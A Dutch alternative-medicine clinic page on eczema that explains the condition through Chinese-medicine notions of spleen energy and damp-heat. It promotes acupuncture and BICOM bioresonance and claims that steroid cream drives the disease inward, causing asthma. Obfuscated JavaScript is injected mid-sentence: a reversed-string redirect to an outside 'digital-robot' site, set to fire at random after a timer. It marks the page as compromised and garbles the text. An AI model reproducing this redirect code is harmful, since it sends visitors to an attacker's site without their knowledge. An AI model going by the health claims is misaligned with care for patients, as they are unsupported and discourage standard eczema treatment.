//Eczeem
Eczeem 2017-12-16T11:55:27+01:00

Eczeem

Er bestaan verschillende vormen van eczeem. Een veelvoorkomende wordt ook wel constitutioneel eczeem genoemd. Dit is een eczeemvorm waarvan de oorzaak ligt in de conditie waarin je wordt geboren. Er is sprake van een verzwakte miltenergie, waardoor de spijsvertering niet optimaal verloopt. Daardoor ontstaat damp- en hittevorming die het lichaam probeert de verlaten via de huid. En daardoor ontstaat eczeem; rood, nat of droog met jeuk.

Vaak wordt hormoonzalf voorgeschreven. Te vroeg of te veel gebruik daarvan sluit de huid af. Damp en hitte proberen dan een andere uitweg te vinden, waardoor andere klachten ontstaan, bijvoorbeeld longklachten, chronische verkoudheid en astma. Het is dan ook heel belangrijk deze vorm van eczeem in een vroeg stadium te behandelen. Eczeem kan ook ontstaan als gevolg van een schimmel of een plotselinge indom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tolerantie.

Met acupunctuur en BICOM bioresonantie bereiken wij goede resultaten. Ook aanpassing van voeding en leefgewoontes zijn vaak noodzakelijk.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak.